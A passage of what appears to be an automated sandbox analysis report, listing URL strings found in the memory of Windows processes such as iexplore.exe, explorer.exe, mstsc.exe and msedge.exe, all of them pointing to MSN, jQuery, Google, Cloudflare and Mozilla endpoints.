          Source: iexplore.exe, 0000001D.00000002.4209070599.000000000A5E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/pr-3693935/IE11NTP/ie-image.png);
          Source: iexplore.exe, 0000000E.00000002.4179072726.0000000006A39000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/pr-3693935/IE11NTP/ie-image.png-0000C05BAE0B
          Source: iexplore.exe, 0000000E.00000002.4184443900.0000000006AF7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000E.00000002.4175868407.00000000063FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/pr-3693935/IE11NTP/ie-image.png...
          Source: iexplore.exe, 0000000E.00000002.4184443900.0000000006A5F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/pr-3693935/IE11NTP/ie-image.png...anon
          Source: iexplore.exe, 0000000E.00000002.4171695825.00000000063C5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/pr-3693935/IE11NTP/ie-image.png79
          Source: iexplore.exe, 0000000E.00000002.4190391744.0000000009510000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/pr-3693935/IE11NTP/ie-image.png?
          Source: iexplore.exe, 0000000E.00000002.4171695825.00000000063C5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/pr-3693935/IE11NTP/ie-image.pngLMEM
          Source: iexplore.exe, 0000001D.00000002.4171805100.0000000006280000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/pr-3693935/IE11NTP/ie-image.pngb_vJ$
          Source: iexplore.exe, 0000000E.00000002.4160624814.00000000030D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/pr-3693935/IE11NTP/ie-image.pnggY
          Source: iexplore.exe, 0000000E.00000002.4171695825.0000000006340000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/pr-3693935/IE11NTP/ie-image.pngk.
          Source: iexplore.exe, 0000000E.00000002.4184443900.0000000006AF7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/pr-3693935/IE11NTP/ie-image.pnglowcapture=
          Source: iexplore.exe, 0000000E.00000002.4225595480.000000000B858000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000E.00000002.4179072726.00000000069D6000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000E.00000002.4171695825.0000000006340000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000E.00000002.4160624814.0000000003116000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000E.00000002.4210548565.000000000ADEC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4171805100.0000000006280000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4160602763.0000000000880000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4220999092.000000000AB8D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/pr-3693935/IE11NTP/logo.png
          Source: iexplore.exe, 0000000E.00000002.4179072726.00000000069D6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/pr-3693935/IE11NTP/logo.png%$
          Source: iexplore.exe, 0000000E.00000002.4179072726.00000000069D6000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000E.00000002.4184443900.0000000006AF7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/pr-3693935/IE11NTP/logo.png...
          Source: iexplore.exe, 0000000E.00000002.4175868407.00000000063FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/pr-3693935/IE11NTP/logo.png...h
          Source: iexplore.exe, 0000000E.00000002.4179072726.00000000069D6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/pr-3693935/IE11NTP/logo.png7$
          Source: iexplore.exe, 0000000E.00000002.4171695825.00000000063C5000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000E.00000002.4165347067.00000000052E2000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000E.00000002.4171695825.000000000635E000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000E.00000002.4160624814.00000000030D7000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000E.00000002.4210548565.000000000ADEC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4160602763.0000000000880000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4160602763.00000000007F7000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4220999092.000000000AB8D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/pr-3693935/IE11NTP/mobile-image.png
          Source: iexplore.exe, 0000001D.00000002.4160602763.00000000007F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/pr-3693935/IE11NTP/mobile-image.png6_
          Source: iexplore.exe, 0000000E.00000002.4160624814.00000000030D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/pr-3693935/IE11NTP/mobile-image.pngGZ
          Source: iexplore.exe, 0000000E.00000002.4171695825.00000000063C5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/pr-3693935/IE11NTP/mobile-image.pngU
          Source: iexplore.exe, 0000000E.00000002.4160624814.00000000030D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/pr-3693935/IE11NTP/mobile-image.pngsY
          Source: iexplore.exe, 0000000E.00000002.4160624814.000000000313F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/prL
          Source: iexplore.exe, 0000001D.00000002.4171805100.0000000006284000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/prz4bJ
          Source: explorer.exe, 00000005.00000002.4165873978.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
          Source: explorer.exe, 00000005.00000002.4165873978.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
          Source: explorer.exe, 00000005.00000000.1760442798.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4165873978.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
          Source: iexplore.exe, 0000001D.00000002.4221270287.000000000ABC0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.comhttps://assets.msn.cn
          Source: iexplore.exe, 0000000E.00000002.4202564168.000000000A832000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000E.00000003.2171894799.000000000A82A000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000E.00000003.2171975111.000000000A831000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.comhttps://assets.msn.cnhttps://assets.msn.com/staticsb/statics/E
          Source: iexplore.exe, 0000000E.00000002.4201829277.000000000A810000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.comhttps://assets.msn.com/resolver/api/resolve/https://assets.msn.cominternetExpl
          Source: iexplore.exe, 0000000E.00000002.4202564168.000000000A832000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000E.00000003.2171894799.000000000A82A000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000E.00000003.2171975111.000000000A831000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.cominternetExplorer
          Source: iexplore.exe, 0000001D.00000002.4212877567.000000000A700000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.cominternetExplorerp
          Source: mstsc.exe, 00000006.00000003.2058101000.0000000006BC6000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000006.00000003.2002328904.0000000006B0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
          Source: iexplore.exe, 0000000E.00000002.4213246226.000000000AEAB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://browser.events.data.microsoftstart.cn/OneCollector/1.0
          Source: iexplore.exe, 0000001D.00000002.4221969780.000000000AC21000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://browser.events.data.microsoftstart.cn/OneCollector/1.0https://events-sandbox.data.microsofts
          Source: iexplore.exe, 0000000E.00000002.4198039153.000000000A57D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://browser.events.data.microsoftstart.cn/OneCollector/1.0s.Gs.G.CTagtransporterConfig.endpoints
          Source: iexplore.exe, 0000000E.00000002.4213246226.000000000AEAB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://browser.events.data.microsoftstart.com/OneCollector/1.0https://events-sandbox.data.microsoft
          Source: iexplore.exe, 0000000E.00000002.4198039153.000000000A57D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://browser.events.data.microsoftstart.com/OneCollector/1.0s.Gs.G.CTagtransporterConfig.endpoint
          Source: iexplore.exe, 0000000E.00000002.4213246226.000000000AEAB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://browser.events.data.msn.cn/OneCollector/1.0
          Source: iexplore.exe, 0000001D.00000002.4221969780.000000000AC2E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://browser.events.data.msn.cn/OneCollector/1.0https://browser.events.data.msn.com/OneCollector/
          Source: iexplore.exe, 0000000E.00000002.4198039153.000000000A57D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://browser.events.data.msn.cn/OneCollector/1.0s.Gs.G.CTagtransporterConfig.endpoints.Gs.G.Comsc
          Source: iexplore.exe, 0000000E.00000002.4190391744.0000000009510000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4177235933.0000000006D60000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://browser.events.data.msn.com/
          Source: iexplore.exe, 0000001D.00000002.4189814301.0000000009984000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://browser.events.data.msn.com/OneColle
          Source: iexplore.exe, 0000000E.00000002.4213246226.000000000AEAB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://browser.events.data.msn.com/OneCollector/1.0
          Source: iexplore.exe, 0000001D.00000002.4189814301.0000000009984000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://browser.events.data.msn.com/OneCollector/1.0?cors=true&c
          Source: iexplore.exe, 0000001D.00000002.4181802065.0000000006F58000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4177235933.0000000006D60000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-strea
          Source: iexplore.exe, 0000000E.00000002.4198039153.000000000A57D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://browser.events.data.msn.com/OneCollector/1.0s.Gs.G.CTagtransporterConfig.endpoints.Gs.G.Coms
          Source: iexplore.exe, 0000000E.00000002.4160624814.00000000030D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://browser.events.data.msn.com/cs/pr-3693935/IE11NTP/mobile-image.png7Y
          Source: iexplore.exe, 0000000E.00000002.4160624814.00000000030D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://browser.events.data.msn.com/l
          Source: iexplore.exe, 0000000E.00000002.4190391744.0000000009510000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://browser.events.data.msn.com/s
          Source: iexplore.exe, 0000000E.00000002.4210835737.000000000AE17000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4223084652.000000000AC8C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://c.microsoftstart.cn/c.gif
          Source: iexplore.exe, 0000000E.00000002.4210835737.000000000AE17000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4223084652.000000000AC8C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://c.microsoftstart.com/c.gif
          Source: iexplore.exe, 0000000E.00000002.4213625525.000000000AED1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://c.msn.cn/c.gif
          Source: iexplore.exe, 0000000E.00000002.4160624814.0000000003116000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4160602763.00000000007EA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4177235933.0000000006DD9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://c.msn.com/
          Source: iexplore.exe, 0000000E.00000002.4171695825.000000000635E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://c.msn.com/#
          Source: iexplore.exe, 0000000E.00000002.4175868407.00000000063FC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000E.00000002.4160624814.000000000317A000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000E.00000002.4225595480.000000000B846000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://c.msn.com/c.gif?rnd=1716792163631&udc=true&pg.n=startpage&pg.t=hp&pg.c=&pg.p=prime&rf=&tp=ht
          Source: iexplore.exe, 0000001D.00000002.4171805100.0000000006327000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4160602763.0000000000857000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4232342849.000000000B622000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4178783359.0000000006DF2000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4164094053.0000000004A70000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4171805100.00000000062D1000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4175644737.000000000636A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://c.msn.com/c.gif?rnd=1716792164798&udc=true&pg.n=startpage&pg.t=hp&pg.c=&pg.p=prime&rf=&tp=ht
          Source: iexplore.exe, 0000000E.00000002.4213625525.000000000AED1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://c.msn.com/c.gifenableConsoleLog
          Source: iexplore.exe, 0000001D.00000002.4221164913.000000000ABA1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://c.msn.com/c.gifhttps://c.msn.cn/c.gif
          Source: iexplore.exe, 0000000E.00000002.4171695825.000000000635E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://c.msn.com/y
          Source: iexplore.exe, 0000001D.00000003.2485695269.0000000009AED000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13D4or
          Source: iexplore.exe, 0000001D.00000002.4228929059.000000000B0D5000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000003.2485695269.0000000009AED000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13D4or-dark
          Source: iexplore.exe, 0000001D.00000002.4228571594.000000000B0A0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13D4orm
          Source: iexplore.exe, 0000001D.00000002.4186152611.00000000094E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13D4orvid-7eygsgpek93wavyp8w5g7mv0uv8bh4nn93
          Source: explorer.exe, 00000005.00000000.1760442798.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4165873978.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
          Source: explorer.exe, 00000005.00000000.1760442798.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4165873978.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
          Source: iexplore.exe, 0000001D.00000002.4236083961.000000000CEF5000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000003.2485695269.0000000009AED000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f4QF
          Source: iexplore.exe, 0000001D.00000003.2485695269.0000000009AED000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f4QF-dark
          Source: iexplore.exe, 0000001D.00000002.4227612951.000000000B01B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f4QF-darkPhttps://img-s-msn-com.akamaized.
          Source: iexplore.exe, 0000001D.00000002.4223084652.000000000AC80000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000003.2485695269.0000000009AED000.00000004.00000001.00020000.00000000.sdmp, me[1].json.29.drString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13g0Ae
          Source: iexplore.exe, 0000001D.00000003.2485695269.0000000009AED000.00000004.00000001.00020000.00000000.sdmp, me[1].json.29.drString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13g0Ae-dark
          Source: iexplore.exe, 0000001D.00000002.4228571594.000000000B0B5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13g0Ae-dark$
          Source: iexplore.exe, 0000001D.00000002.4222372836.000000000AC57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13g0AeDy
          Source: iexplore.exe, 0000001D.00000003.2485695269.0000000009AED000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gDfu
          Source: iexplore.exe, 0000001D.00000003.2485695269.0000000009AED000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gDfu-dark
          Source: iexplore.exe, 0000001D.00000002.4186152611.00000000094E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gDfuThe
          Source: iexplore.exe, 0000001D.00000002.4228571594.000000000B0B5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gDjX-dark49t
          Source: iexplore.exe, 0000001D.00000002.4221164913.000000000ABA1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gDjXvid-mgh7y4jnc2sdh78kbccmd6m8kekefsabiu
          Source: iexplore.exe, 0000001D.00000002.4228571594.000000000B0B5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gDkX-dark
          Source: iexplore.exe, 0000001D.00000002.4223084652.000000000AC80000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gDkXD
          Source: iexplore.exe, 0000001D.00000003.2485695269.0000000009AED000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF7M
          Source: iexplore.exe, 0000001D.00000003.2485695269.0000000009AED000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF7M-dark
          Source: iexplore.exe, 0000001D.00000002.4222372836.000000000AC57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF7M3
          Source: explorer.exe, 00000005.00000000.1760442798.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4165873978.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
          Source: explorer.exe, 00000005.00000000.1760442798.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4165873978.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
          Source: iexplore.exe, 0000001D.00000002.4228929059.000000000B0D5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gK4J-dark
          Source: iexplore.exe, 0000001D.00000002.4228571594.000000000B0B5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gK4J-dark49
          Source: iexplore.exe, 0000001D.00000002.4186152611.00000000094E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gK4JHe
          Source: iexplore.exe, 0000001D.00000002.4221164913.000000000ABA1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gK4Jvid-7eygsgpek93wavyp8w5g7mv0uv8bh4nn93
          Source: iexplore.exe, 0000001D.00000002.4221164913.000000000ABA1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKhb
          Source: iexplore.exe, 0000001D.00000002.4228571594.000000000B0B5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKhb-dark
          Source: iexplore.exe, 0000001D.00000002.4228571594.000000000B0A0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKhb-darkhttps://img-s-msn-com.akamaized.n
          Source: iexplore.exe, 0000001D.00000002.4186152611.00000000094E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKhbhttps://vid.newsweek.com/fani-willis-n
          Source: explorer.exe, 00000005.00000000.1760442798.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4165873978.0000000007900000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4236083961.000000000CEF5000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4190700229.0000000009A15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
          Source: explorer.exe, 00000005.00000000.1760442798.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4165873978.0000000007900000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4227612951.000000000B01B000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4190700229.0000000009A15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
          Source: iexplore.exe, 0000001D.00000002.4227213508.000000000AFAE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gRyR
          Source: explorer.exe, 00000005.00000000.1760442798.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4165873978.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
          Source: explorer.exe, 00000005.00000000.1760442798.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4165873978.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
          Source: iexplore.exe, 0000001D.00000002.4228571594.000000000B0A0000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4227213508.000000000AFAE000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000003.2485695269.0000000009AED000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13govM
          Source: iexplore.exe, 0000001D.00000002.4222761580.000000000AC6F000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000003.2485695269.0000000009AED000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13govM-dark
          Source: iexplore.exe, 0000001D.00000002.4228571594.000000000B0B5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13govM-darkH
          Source: iexplore.exe, 0000001D.00000002.4221164913.000000000ABA1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13govM/
          Source: iexplore.exe, 0000001D.00000002.4228571594.000000000B0A0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gywM
          Source: Network Persistent State0.19.drString found in binary or memory: https://chrome.cloudflare-dns.com
          Source: msedge.exe, 00000021.00000002.2249060324.00003D540017C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000023.00000002.2330176804.00001AA40221E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore
          Source: msedge.exe, 00000021.00000002.2249060324.00003D540017C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000023.00000002.2330176804.00001AA40221E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromewebstore.google.com/
          Source: msedge.exe, 00000021.00000002.2248203513.00003D5400020000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000023.00000002.2330176804.00001AA40221E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx
          Source: iexplore.exe, 0000000E.00000002.4175868407.000000000642C000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4178783359.0000000006E0B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://code.jquery.com/
          Source: iexplore.exe, 0000001D.00000002.4178783359.0000000006E0B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://code.jquery.com/A
          Source: iexplore.exe, 0000000E.00000002.4175868407.000000000642C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://code.jquery.com/Q
          Source: iexplore.exe, 0000000E.00000002.4175868407.000000000642C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://code.jquery.com/i
          Source: iexplore.exe, 0000000E.00000002.4179072726.0000000006A06000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000E.00000002.4200849827.000000000A7CB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000E.00000002.4171695825.00000000063E9000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4223626103.000000000ACD0000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4178783359.0000000006E0B000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4189410566.0000000009890000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4212877567.000000000A700000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://code.jquery.com/jquery-3.6.3.min.js
          Source: iexplore.exe, 0000001D.00000002.4189410566.0000000009890000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://code.jquery.com/jquery-3.6.3.min.js%
          Source: iexplore.exe, 0000000E.00000002.4200849827.000000000A7CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://code.jquery.com/jquery-3.6.3.min.js.text
          Source: iexplore.exe, 0000000E.00000002.4179072726.0000000006A53000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://code.jquery.com/jquery-3.6.3.min.js/6
          Source: iexplore.exe, 0000001D.00000002.4212877567.000000000A700000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://code.jquery.com/jquery-3.6.3.min.js0
          Source: iexplore.exe, 0000001D.00000002.4171805100.0000000006280000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://code.jquery.com/jquery-3.6.3.min.js693935/IE11NTP/Icon.png
